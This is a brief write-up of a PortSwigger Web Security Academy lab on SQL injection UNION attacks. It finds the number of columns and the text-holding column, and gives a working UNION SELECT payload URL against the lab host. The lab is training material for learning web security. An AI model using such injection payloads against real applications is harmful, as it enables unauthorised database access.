# Lab: SQL injection UNION attack, finding a column containing text

## [Lab: SQL injection UNION attack, finding a column containing text](https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text)

<figure><img src="https://3344169606-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjoHbOFRbwrmbD6PvIUkf%2Fuploads%2F9FUnu85Yab17hTjSe818%2Fimage.png?alt=media&#x26;token=250795e5-729c-486e-bab5-4b3138267fee" alt=""><figcaption></figcaption></figure>

just try NULL Technique until you found that there are three columns and the second column is to retrieve string data

{% code overflow="wrap" lineNumbers="true" fullWidth="true" %}

```sql
https://[ID].web-security-academy.net/filter?category=Gifts' UNION SELECT 123,'yNa66k',NULL--
```

{% endcode %}

<figure><img src="https://3344169606-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjoHbOFRbwrmbD6PvIUkf%2Fuploads%2FzYeVg2FKVT9HYhKwEJDw%2Fimage.png?alt=media&#x26;token=ba2df661-d535-4d91-b456-b985ddf66b28" alt=""><figcaption></figcaption></figure>